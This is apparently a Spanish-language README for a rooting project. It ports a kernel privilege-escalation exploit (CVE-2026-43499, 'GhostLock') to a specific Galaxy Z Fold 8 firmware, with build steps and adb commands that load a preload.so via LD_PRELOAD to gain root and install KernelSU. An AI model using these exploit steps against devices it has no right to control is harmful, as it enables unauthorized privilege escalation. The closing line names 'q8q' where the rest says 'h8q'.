
# GhostLock CVE-2026-43499 port para Galaxy Z Fold 8 (h8q)
La mayor parte de este código se basa en el fork de @polygraphene del original.
Se requirieron modificaciones importantes porque el primer paso principal (select()) utilizado en la mayoría de las variantes publicadas del exploit no se alinea correctamente con la estructura rt_mutex_waiter en estos objetivos Samsung con kernel 6.12. En su lugar se utiliza io_submit().
Funciona en: h8q-F971USQU1AZFW (SM-F971U, P0=0xc7800000). Compilar con make PROJECT=h8q-F971USQU1AZFW.
git clone (este repositorio)
cd (este repositorio)
export ANDROID_NDK_ROOT=(ruta de tu ndk)
make
Compila ksud + kernelsu.ko usando este árbol de polygraphene y siguiendo esta instrucción. Este árbol contiene un parche de BuSung-dev/Root-My-Galaxy y la adaptación para 6.12.
$ adb install /path/to/KernelSu_Manager.apk
$ adb push build/preload.so /data/local/tmp/
$ adb push $KERNELSU/target/aarch64-linux-android/release/ksud /data/local/tmp/
$ adb shell env LD_PRELOAD=/data/local/tmp/preload.so sh -c 'echo PWND'
io_submit para q8q